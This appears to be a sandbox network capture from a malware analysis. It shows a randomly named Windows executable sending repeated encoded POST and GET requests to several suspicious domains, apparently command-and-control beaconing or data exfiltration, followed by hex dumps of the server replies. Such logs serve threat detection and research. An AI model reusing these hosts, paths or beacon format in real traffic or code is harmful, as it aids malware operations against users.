                                                                                                Data Raw: 49 42 51 50 3d 4d 59 70 49 7a 6c 2f 43 36 77 46 79 50 61 55 72 70 4d 4a 38 69 2f 43 4c 71 33 4f 42 53 6e 30 62 41 46 6b 45 77 4c 63 6c 54 54 5a 58 58 76 54 6c 5a 6f 72 77 6d 69 63 72 41 4b 61 6d 57 48 55 43 78 48 58 53 63 69 48 68 4e 35 48 74 7a 49 58 53 54 49 45 62 73 31 66 47 76 32 66 47 78 49 61 30 43 7a 74 66 62 54 56 58 48 38 58 65 65 56 39 72 44 74 4f 58 79 36 6d 39 6b 2f 57 41 6f 54 70 64 64 78 4c 50 32 59 45 38 62 36 65 51 4d 36 5a 75 61 44 57 57 31 2b 46 38 7a 65 68 68 4e 56 67 59 45 62 67 68 6b 4b 33 39 35 52 79 6c 36 38 7a 66 52 62 61 67 57 78 47 4d 49 77 30 32 5a 39 71 34 51 6a 44 57 66 41 41 30 52 61 79 54 7a 43 4c 79 58 4a 43 4b 35 4f 6b 6c 6d 52 32 52 57 37 65 30 59 6b 4c 75 6e 68 43 46 76 5a 30 43 69 6d 78 32 33 62 2b 69 4a 62 6a 46 4c 31 43 68 41 32 54 76 68 6f 35 56 6b 77 54 4d 35 4b 50 47 6d 4e 68 51 48 69 56 43 39 65 68 7a 73 53 33 71 4a 71 4b 57 74 4f 56 74 34 57 52 70 2b 55 56 4a 46 73 37 69 59 36 41 4b 41 33 72 49 4b 77 64 33 4b 39 4c 4e 50 79 50 32 59 7a 75 4a 59 6c 32 68 54 [TRUNCATED]
                                                                                                Data Ascii: IBQP=MYpIzl/C6wFyPaUrpMJ8i/CLq3OBSn0bAFkEwLclTTZXXvTlZorwmicrAKamWHUCxHXSciHhN5HtzIXSTIEbs1fGv2fGxIa0CztfbTVXH8XeeV9rDtOXy6m9k/WAoTpddxLP2YE8b6eQM6ZuaDWW1+F8zehhNVgYEbghkK395Ryl68zfRbagWxGMIw02Z9q4QjDWfAA0RayTzCLyXJCK5OklmR2RW7e0YkLunhCFvZ0Cimx23b+iJbjFL1ChA2Tvho5VkwTM5KPGmNhQHiVC9ehzsS3qJqKWtOVt4WRp+UVJFs7iY6AKA3rIKwd3K9LNPyP2YzuJYl2hTCglY5CEqfZKEKKVX2Bzrxn/q8ERLPNfxcYizjc3wtMeHERRR/BvOJ842Lobx1IoOv7EkDOPRYRxuw8+OmYWmG+ssvWRORh2lpke7UFg+U02Gfv99poJJ39L8/oKX0S8Hwp0i6p1pmhiEKpzdcCWV50bOoYUVBqorA59ka0PtGlLCcTIm6tlrhQ5E4bBZcO6W77jB2Pp/+q/xsC1fb1WiU9xtZ6Mc46QLNqb87EY1xn0MAiZ3lNp5P6zvHFh46khg47IMXExjagFC4s7553GAq+gIdA+ExKBPIMHnfKwrXmIC9Ws2sJeNHjgYCL0KTPIl3bW//SVwWk0OXYuV99Rzjml6s/+gJZdm/5CaUAi4ZSdsoTR0R4RYrXdY6/PlNw9WZhtdkkrF+VfAvFT2rG4pVsyNIXhXztfSrNfvEq/A2P85CzIrjx8O0Sgcf5CQxTkrDLaMqoiXK1nG3VXwWQo97InSpN6QeKxKdJVJqKBADaFMfKt29GUo3hSo82eWU6WPeD1jf++dncs8YerpKYqWmqOKRXuN4Dszi/u5iNNLig8vSwZxigjSWG8eLi6dWpJ5w8LGGUlxlDj3eAcNhJ8O73qBnXIUhvDzzXAUR2A8EUlr7Q9Yq9VezYxYfuvRqXNVM7KGWUCocXs7qlzzQCVXIdeLgyMgQ8O8rg [TRUNCATED]
                                                                                                Nov 11, 2024 17:03:25.701786041 CET5341OUTData Raw: 4a 44 6d 77 54 48 41 4b 77 4f 38 59 47 61 49 4c 4c 4a 34 38 33 5a 50 70 63 6c 45 2f 76 34 6b 79 46 65 79 5a 32 63 6b 77 62 49 79 4f 6c 54 51 5a 54 66 62 4e 44 4b 71 63 36 42 33 73 31 56 53 71 70 50 43 75 79 63 6c 49 68 6c 65 4b 51 47 63 75 41 4f
                                                                                                Data Ascii: JDmwTHAKwO8YGaILLJ483ZPpclE/v4kyFeyZ2ckwbIyOlTQZTfbNDKqc6B3s1VSqpPCuyclIhleKQGcuAO4G/8lL4uP1PHy5uJXtEr9FQaKW0mdVaRDot0ybKVke/XwBxzgoYPFWL6PkuMNsvzWqkDwXVhOLSTBmp4/QQOGEDZXd914mPNpHzj/M853eqbsfz096Is3dKVx4qp8hz64ssRNdV7ILArNRcyVSX/ZbBkW9m4Abius


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                40192.168.11.20497873.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:03:28.354531050 CET494OUTGET /jwt5/?Lr3=uHMLTHRPCpsdapr&IBQP=BaBowTLo1loeAIpV7vVht/vx80fLXkEoZngrzLsBdCIsVeqAfJzss3Y0HZ2vI18y1WvYWAn/Doi+9ZPlOuIBlgbOtHjG5I6MGjR7KAsuAsv6BFY+Gayvzv4= HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.imgiu9.vip
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:03:28.518465042 CET400INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:03:28 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4c 72 33 3d 75 48 4d 4c 54 48 52 50 43 70 73 64 61 70 72 26 49 42 51 50 3d 42 61 42 6f 77 54 4c 6f 31 6c 6f 65 41 49 70 56 37 76 56 68 74 2f 76 78 38 30 66 4c 58 6b 45 6f 5a 6e 67 72 7a 4c 73 42 64 43 49 73 56 65 71 41 66 4a 7a 73 73 33 59 30 48 5a 32 76 49 31 38 79 31 57 76 59 57 41 6e 2f 44 6f 69 2b 39 5a 50 6c 4f 75 49 42 6c 67 62 4f 74 48 6a 47 35 49 36 4d 47 6a 52 37 4b 41 73 75 41 73 76 36 42 46 59 2b 47 61 79 76 7a 76 34 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Lr3=uHMLTHRPCpsdapr&IBQP=BaBowTLo1loeAIpV7vVht/vx80fLXkEoZngrzLsBdCIsVeqAfJzss3Y0HZ2vI18y1WvYWAn/Doi+9ZPlOuIBlgbOtHjG5I6MGjR7KAsuAsv6BFY+Gayvzv4="}</script></head></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                41192.168.11.204978845.79.252.94807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:03:33.915977001 CET774OUTPOST /s6a5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.premium303max.rest
                                                                                                Origin: http://www.premium303max.rest
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.premium303max.rest/s6a5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 6a 55 6d 50 52 4a 6b 46 76 36 63 51 4a 7a 76 2f 47 34 49 6d 78 53 67 76 4d 78 6b 6a 33 52 34 62 75 6e 54 57 50 77 48 78 76 2f 33 51 39 55 74 51 51 42 35 72 34 41 55 70 69 39 54 39 4c 77 31 46 39 52 6d 61 59 54 71 53 32 74 37 78 78 4c 34 2f 4f 6c 76 47 67 6f 62 59 46 68 43 6e 49 39 61 6c 63 79 37 37 6b 54 31 77 49 79 4b 70 4b 4a 4f 41 53 36 65 6e 35 67 41 66 47 77 6a 62 38 52 64 4c 72 59 55 37 75 4d 67 4e 4a 50 2f 41 51 6a 61 43 55 65 6f 50 4c 37 4e 34 6b 31 4c 5a 39 54 41 63 4a 51 74 35 5a 37 4b 66 6f 66 53 5a 32 5a 41 74 4d 38 56 31 67 52 55 6f 63 75 50 44 73 6b 49 5a 32 77 3d 3d
                                                                                                Data Ascii: IBQP=jUmPRJkFv6cQJzv/G4ImxSgvMxkj3R4bunTWPwHxv/3Q9UtQQB5r4AUpi9T9Lw1F9RmaYTqS2t7xxL4/OlvGgobYFhCnI9alcy77kT1wIyKpKJOAS6en5gAfGwjb8RdLrYU7uMgNJP/AQjaCUeoPL7N4k1LZ9TAcJQt5Z7KfofSZ2ZAtM8V1gRUocuPDskIZ2w==
                                                                                                Nov 11, 2024 17:03:34.560483932 CET399INHTTP/1.1 301 Moved Permanently
                                                                                                date: Mon, 11 Nov 2024 16:03:33 GMT
                                                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                                                x-ua-compatible: IE=edge
                                                                                                x-redirect-by: WordPress
                                                                                                vary: X-Forwarded-Proto,Accept-Encoding
                                                                                                location: https://www.premium303max.rest/s6a5/
                                                                                                content-length: 0
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                server: Apache
                                                                                                connection: close


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                42192.168.11.204978945.79.252.94807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:03:36.574029922 CET794OUTPOST /s6a5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.premium303max.rest
                                                                                                Origin: http://www.premium303max.rest
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.premium303max.rest/s6a5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 6a 55 6d 50 52 4a 6b 46 76 36 63 51 47 33 72 2f 41 5a 49 6d 36 53 67 73 51 68 6b 6a 35 78 35 53 75 6e 66 57 50 79 72 68 76 74 54 51 39 31 64 51 52 41 35 72 37 41 55 70 70 64 54 6c 56 41 31 34 39 52 62 76 59 53 47 53 32 73 62 78 78 4f 63 2f 53 43 62 48 68 34 62 61 4d 42 43 79 56 74 61 6c 63 79 37 37 6b 54 68 4a 49 79 43 70 4b 36 57 41 54 62 65 6d 77 41 41 65 57 67 6a 62 34 52 64 48 72 59 55 38 75 4e 39 6f 4a 4e 48 41 51 68 53 43 55 4c 63 51 53 72 4e 45 36 46 4b 6d 35 52 6f 56 41 44 64 62 59 72 61 74 67 73 57 68 7a 50 4e 33 52 4f 68 52 6a 43 49 61 59 65 32 72 75 6d 4a 43 72 35 5a 2b 4b 38 48 79 2f 2f 6a 73 78 34 31 6e 54 56 48 37 38 4d 63 3d
                                                                                                Data Ascii: IBQP=jUmPRJkFv6cQG3r/AZIm6SgsQhkj5x5SunfWPyrhvtTQ91dQRA5r7AUppdTlVA149RbvYSGS2sbxxOc/SCbHh4baMBCyVtalcy77kThJIyCpK6WATbemwAAeWgjb4RdHrYU8uN9oJNHAQhSCULcQSrNE6FKm5RoVADdbYratgsWhzPN3ROhRjCIaYe2rumJCr5Z+K8Hy//jsx41nTVH78Mc=
                                                                                                Nov 11, 2024 17:03:36.978610039 CET399INHTTP/1.1 301 Moved Permanently
                                                                                                date: Mon, 11 Nov 2024 16:03:36 GMT
                                                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                                                x-ua-compatible: IE=edge
                                                                                                x-redirect-by: WordPress
                                                                                                vary: X-Forwarded-Proto,Accept-Encoding
                                                                                                location: https://www.premium303max.rest/s6a5/
                                                                                                content-length: 0
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                server: Apache
                                                                                                connection: close


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                43192.168.11.204979045.79.252.94807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:03:39.229911089 CET2578OUTPOST /s6a5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.premium303max.rest
                                                                                                Origin: http://www.premium303max.rest
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.premium303max.rest/s6a5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 6a 55 6d 50 52 4a 6b 46 76 36 63 51 47 33 72 2f 41 5a 49 6d 36 53 67 73 51 68 6b 6a 35 78 35 53 75 6e 66 57 50 79 72 68 76 74 62 51 39 47 46 51 51 6a 52 72 36 41 55 70 67 39 54 6d 56 41 31 70 39 52 7a 6a 59 54 36 73 32 70 66 78 7a 6f 41 2f 43 77 7a 48 76 49 62 61 54 52 43 6d 49 39 62 34 63 79 4c 33 6b 54 78 4a 49 79 43 70 4b 38 36 41 61 71 65 6d 32 41 41 66 47 77 6a 58 38 52 63 53 72 5a 77 4b 75 4e 6f 64 4a 35 37 41 51 42 43 43 57 39 41 51 4e 37 4e 38 37 46 4b 2b 35 52 31 4e 41 44 42 66 59 72 76 47 67 76 6d 68 79 49 38 6a 55 66 39 35 34 6b 4d 52 48 63 4f 47 35 6c 70 6f 70 34 56 72 62 39 71 65 37 36 62 6f 36 34 35 37 42 32 4c 4e 67 70 6e 41 6e 34 63 57 6f 44 68 7a 7a 53 7a 4f 57 51 45 65 75 77 7a 71 4b 75 6f 45 65 59 50 6f 70 4a 4a 5a 52 30 43 7a 72 39 54 38 74 57 36 32 41 7a 6a 76 52 49 76 4c 32 78 6b 6a 47 70 2b 46 4e 55 75 49 4b 6f 67 30 4d 31 48 69 69 73 4c 6c 57 48 36 32 57 59 2f 71 50 53 77 46 64 32 59 54 63 70 36 6b 30 52 57 70 66 6c 38 67 6b 66 33 4a 59 57 7a 33 39 34 6a 46 66 [TRUNCATED]
                                                                                                Data Ascii: IBQP=jUmPRJkFv6cQG3r/AZIm6SgsQhkj5x5SunfWPyrhvtbQ9GFQQjRr6AUpg9TmVA1p9RzjYT6s2pfxzoA/CwzHvIbaTRCmI9b4cyL3kTxJIyCpK86Aaqem2AAfGwjX8RcSrZwKuNodJ57AQBCCW9AQN7N87FK+5R1NADBfYrvGgvmhyI8jUf954kMRHcOG5lpop4Vrb9qe76bo6457B2LNgpnAn4cWoDhzzSzOWQEeuwzqKuoEeYPopJJZR0Czr9T8tW62AzjvRIvL2xkjGp+FNUuIKog0M1HiisLlWH62WY/qPSwFd2YTcp6k0RWpfl8gkf3JYWz394jFfsQydZ1XmTHoNmFxdTEOkY41xXFgGsPPjuyKtE+qmOi1EQgit7CH+2FJtz9bWvpG+bQ+LF0fOUDpNryL53FuEUYutzoTrEx9dlctGp/frEShw2A00cCidoILHAZ107TQDSW2iZeKac40GWNkSv/8A5yox1y+s9GaWXsKv2e1EntYksR83sqRBp8ZZJXHlCXm4S5lJG4iEpEam5GUyvzGKSlafT5dMuvf2GkNp9QkPdyzBnQQRVki9DgWFR0AUx5oVRXols+0xqh5qnhItAtWNkti11RX2Knb1RXxLj59IMO7qkqIyf9zv26LL71l0IQ3mDAftyEJZn5WdsO2AI6SEJMTiZoYKJmQKuXJNT8HUdQEBFU+85VvTgcstPE5+s22ZveTU+/0ijHSfLJDfsze1gMmqKPD5rId9S/aDcV9Zx4l9mYnk3yD0ViUITWOqz4OnTwYMoqp+Nw7jOi5MIVxuMJJWJQoq5P84F6aNX44RQjQZTtYPTzxeq5gJ1hClbB8Yx3JMmNYs04WqcMRX1VkLBO8+PniAu6dSXqEyCggJrJJYLe7UwfVEmpqY4iqcOCLgCSIBXjkcaXkz23z7KbJWyFWcQXu+JQHNLKu2L7pbK3pyC1AHUazDIOHnun+ngPjhPUA8ggWy/oJfEI2XHr16t716dnFDjfK8Ey [TRUNCATED]
                                                                                                Nov 11, 2024 17:03:39.229935884 CET5156OUTData Raw: 75 64 67 53 74 30 74 61 33 6f 63 6c 79 72 70 2f 50 55 61 32 45 38 51 33 64 48 59 39 4a 44 6b 77 6a 75 34 37 31 43 65 67 4d 57 6a 4c 4c 5a 56 45 63 47 58 58 6e 55 37 32 6b 4c 77 71 6a 38 30 7a 77 34 31 59 47 69 47 59 6a 59 71 6d 71 63 33 57 51 30
                                                                                                Data Ascii: udgSt0ta3oclyrp/PUa2E8Q3dHY9JDkwju471CegMWjLLZVEcGXXnU72kLwqj80zw41YGiGYjYqmqc3WQ0+i3t7jUMYRiX+LNSxmuZt7LpD396H5/H9bO2rsj88R6gMN8RVpq3CUL0lw8jUzs8XGg00rAFU1jHt2deCX2inRP6JlL63CDFc06feZttRAeXWSJszFWJO15JpFq5NDjyhAyUnwPjW2p8sQhrBbal+KJMTAc6+Wban
                                                                                                Nov 11, 2024 17:03:39.230006933 CET209OUTData Raw: 65 6f 6e 58 6b 63 4d 66 32 31 79 78 65 41 47 68 32 36 34 66 69 50 5a 63 35 77 4a 51 50 57 44 45 6a 2b 66 32 6c 6b 30 6f 33 6c 42 72 37 45 61 4c 52 35 6d 42 30 59 52 35 56 5a 49 44 44 6e 50 73 43 66 51 79 74 2f 63 72 49 65 49 4d 67 50 35 52 2f 4e
                                                                                                Data Ascii: eonXkcMf21yxeAGh264fiPZc5wJQPWDEj+f2lk0o3lBr7EaLR5mB0YR5VZIDDnPsCfQyt/crIeIMgP5R/Nm0iSh9uO9jQYMe7lJCwv+3TUtn+Sk/usJu5nzsmcVLDmZ01jDSyb2n0sSwbKLvmM9P25KNz6VubgSm8WjNo6zrphmmkFZY216tBBQqS2u45UWeWyisMMNyQ6+e2fg==
                                                                                                Nov 11, 2024 17:03:40.075690985 CET399INHTTP/1.1 301 Moved Permanently
                                                                                                date: Mon, 11 Nov 2024 16:03:39 GMT
                                                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                                                x-ua-compatible: IE=edge
                                                                                                x-redirect-by: WordPress
                                                                                                vary: X-Forwarded-Proto,Accept-Encoding
                                                                                                location: https://www.premium303max.rest/s6a5/
                                                                                                content-length: 0
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                server: Apache
                                                                                                connection: close


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                44192.168.11.204979145.79.252.94807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:03:41.883053064 CET502OUTGET /s6a5/?IBQP=uWOvS5Yjm7YhBkSIFatO2CB0bHUF5BB4gnfnOBn+6NyL3nxueSJAzVs8h9i9KFJmzD+/RgmGnJLg06gAUSOGsu+lNFioW5q3ewPUsSx7AySWAK21Xanb2Bs=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.premium303max.rest
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:03:42.595132113 CET540INHTTP/1.1 301 Moved Permanently
                                                                                                date: Mon, 11 Nov 2024 16:03:41 GMT
                                                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                                                x-ua-compatible: IE=edge
                                                                                                x-redirect-by: WordPress
                                                                                                vary: X-Forwarded-Proto,Accept-Encoding
                                                                                                location: http://premium303max.rest/s6a5/?IBQP=uWOvS5Yjm7YhBkSIFatO2CB0bHUF5BB4gnfnOBn+6NyL3nxueSJAzVs8h9i9KFJmzD+/RgmGnJLg06gAUSOGsu+lNFioW5q3ewPUsSx7AySWAK21Xanb2Bs=&Lr3=uHMLTHRPCpsdapr
                                                                                                content-length: 0
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                server: Apache
                                                                                                connection: close


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                45192.168.11.204979243.156.106.109807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:03:48.159785032 CET765OUTPOST /b38f/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.155n8etsy.autos
                                                                                                Origin: http://www.155n8etsy.autos
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.155n8etsy.autos/b38f/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 57 47 74 48 32 57 6b 6e 48 6f 4b 73 31 4f 6e 41 61 4a 64 69 62 51 59 54 34 71 31 36 43 45 71 72 49 46 5a 44 48 73 6d 74 5a 6f 4a 41 43 52 4b 6e 64 58 58 57 49 45 58 45 57 65 59 36 56 6d 54 30 67 53 45 72 61 41 56 76 49 45 7a 74 5a 6c 6d 76 49 73 2f 43 6e 58 54 38 73 52 30 4d 4c 45 74 71 66 6a 54 37 4c 57 58 71 6d 51 6d 6d 35 4a 54 39 36 2b 67 42 36 45 72 63 7a 70 47 47 62 6f 4e 31 6a 2b 41 33 65 56 38 56 5a 62 57 61 55 54 48 2f 6f 74 47 6a 51 4f 41 70 64 35 70 68 43 55 5a 37 69 6b 4b 4e 37 71 34 5a 6f 34 2b 6d 57 51 33 4b 61 68 32 2b 42 79 59 30 38 43 34 4d 55 32 76 33 39 41 3d 3d
                                                                                                Data Ascii: IBQP=WGtH2WknHoKs1OnAaJdibQYT4q16CEqrIFZDHsmtZoJACRKndXXWIEXEWeY6VmT0gSEraAVvIEztZlmvIs/CnXT8sR0MLEtqfjT7LWXqmQmm5JT96+gB6ErczpGGboN1j+A3eV8VZbWaUTH/otGjQOApd5phCUZ7ikKN7q4Zo4+mWQ3Kah2+ByY08C4MU2v39A==
                                                                                                Nov 11, 2024 17:03:48.564088106 CET1289INHTTP/1.1 404 Not Found
                                                                                                Server: Tengine
                                                                                                Date: Mon, 11 Nov 2024 16:03:48 GMT
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Content-Length: 58288
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                ETag: "6729ca88-e3b0"
                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                Nov 11, 2024 17:03:48.564110994 CET1289INData Raw: 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41
                                                                                                Data Ascii: v class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJ
                                                                                                Nov 11, 2024 17:03:48.564130068 CET1289INData Raw: 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35
                                                                                                Data Ascii: e+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/u
